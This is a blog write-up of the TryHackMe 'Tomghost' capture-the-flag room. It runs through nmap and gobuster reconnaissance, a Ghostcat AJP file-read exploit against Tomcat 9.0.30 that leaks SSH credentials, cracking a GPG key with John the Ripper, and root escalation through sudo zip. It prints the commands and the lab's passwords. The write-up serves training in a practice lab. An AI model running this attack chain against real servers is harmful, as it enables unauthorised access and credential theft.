THM Tomghost room
This room was fun and one of the easier ones once I found some tooling on GitHub. I like that they have rooms related to the CVEs that are published and give you some experience with them. Well, enough with the intro time to get to it.
The first thing that I always do is run an nmap scan. The one that I usually do first is
nmap -p- IP_ADDRESS to get a scan of all the ports that are open. Once I have the list to narrow down, I then will do a more focused scan to get versions and possible scripts that could be run. That command looks like
nmap -p PORTS -sC -sV -oA server IP_ADDRESS. The output is in the next section below.
Nmap scan report for 10.10.69.119 Host is up (0.28s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA) | 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA) |_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519) 53/tcp open tcpwrapped 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.30 |_http-favicon: Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache Tomcat/9.0.30 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I can see that there is a different port than usual open 8009 and it has a service of Apache Jserv running. I don't know what that is, so it's off to Google to see what we can come up with. While I am doing that I run gobuster against port 8080 to see if there are any pages of interest and the results are below.
/docs (Status: 302) [Size: 0] [--> /docs/] /examples (Status: 302) [Size: 0] [--> /examples/] /manager (Status: 302) [Size: 0] [--> /manager/]
This is an Apache Tomcat server and the version that it's running (9.0.30) is related to CVE-2020-10487. I searched GitHub and came across this tool, 00theway and that seemed to give me what I needed. The following command I used to see what output I would get from the server.
python ajpShooter.py http://10.10.106104:8080 8009 /WEB-INF.xml read
I got a good response and the following credentials were found.
- Username: skyfuck
- Password: 8730281lkjlkjdqlksalks
Time to see what we can do with the credentials that we found. Let's see if ssh will work with the username and password that were found above. And I am in luck, I am now on the box as skyfuck. As always, the next thing to do is list the contents of the directory that I am in and I see that we have a private key and an encrypted message.
The next step is to download those items to my VM. To do that I will use scp to copy using the following command:
After getting the items on the VM I try to import the private key and I can't because I don't have the password.
Time to convert the key to a format that John the Ripper can read. Since I can't remember where the file is located on my machine
locate gpg2john will be used to find it. Once the program is found the next thing to do is use it to convert the file.
./gpg2john private_key > hash and then
john --wordlist=~/CTF/words/pass.txt key.hash.
Here is the output of what JtR tells me.
Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65536 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status alexandru (tryhackme) 1g 0:00:00:00 DONE (2022-04-23 17:10) 5.555g/s 63288p/s 63288c/s 63288C/s alexander..amaleta Use the "--show" option to display all of the cracked passwords reliably Session completed.
Now I have the key that I need to import the private key and then decrypt the encrypted message.
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11 "tryhackme <firstname.lastname@example.org>" merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
I now have a different user and password to use. So, I will switch to that user and see what that user can do. I see that there is the user flag file in Merlin's home folder, so let's submit that before I forget.
Now that I am Merlin, I use the
sudo -l to see what Merlin can do as a super user. I see that Merlin can run zip as a super user. With that information it's off to GTFO bins to see how that can be used to get the root.txt flag.
Using the command that is given on that website I now can elevate to the root user and then view the root.txt file and the room is complete.
As always, if you have questions or feedback about anything I say please email me.